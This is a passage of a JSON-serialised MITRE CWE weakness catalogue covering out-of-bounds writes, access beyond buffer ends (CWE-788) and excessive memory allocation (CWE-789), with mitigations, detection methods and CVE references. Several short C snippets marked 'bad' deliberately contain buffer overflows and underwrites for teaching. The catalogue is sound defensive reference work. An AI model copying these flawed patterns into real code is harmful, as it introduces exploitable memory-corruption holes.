etc."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code attempts to save four different identification numbers into an array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int id_sequence[3];/* Populate the id array. */id_sequence[0] = 123;id_sequence[1] = 234;id_sequence[2] = 345;id_sequence[3] = 456;","xhtml:br":["","","","","","",""]}},"Body_Text":"Since the array is only allocated to hold three elements, the valid indices are 0 to 2; so, the assignment to id_sequence[3] is out of bounds."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index &lt; length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets &gt; MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i&lt;numWidgets; i++) {}WidgetList[numWidgets] = NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &amp;srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-0022","Description":"chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"},{"Reference":"CVE-2009-1532","Description":"malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532"},{"Reference":"CVE-2009-0269","Description":"chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269"},{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Stack Overruns&#34; Page 129"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Heap Overruns&#34; Page 138"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-90"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"}]}},"788":{"attr":{"@_ID":"788","@_Name":"Access of Memory Location After End of Buffer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer; when pointer arithmetic results in a position before the buffer; or when a negative index is used, which generates a position before the buffer.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"},{"Reference":"CVE-2009-0689","Description":"large precision value in a format string triggers overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689"},{"Reference":"CVE-2009-0558","Description":"attacker-controlled array index leads to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"},{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-788"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-788"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}]}},"789":{"attr":{"@_ID":"789","@_Name":"Memory Allocation with Excessive Size Value","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1284","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion","Description":"When a weakness allocates excessive memory on the stack, it is often described as \\"stack exhaustion,\\" which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Memory)","Note":"Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"Perform adequate input validation against any value that influences the amount of memory that is allocated. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary."},{"Phase":"Operation","Description":"Run your program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider the following code, which accepts an untrusted size value and allocates a buffer to contain a string of the given size.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int size = GetUntrustedInt();unsigned int totBytes = size * sizeof(char);char *string = (char *)malloc(totBytes);InitializeString(string);","xhtml:br":["","","","",""],"xhtml:i":"/* ignore integer overflow (CWE-190) for this example */"}},"Body_Text":["Suppose an attacker provides a size value 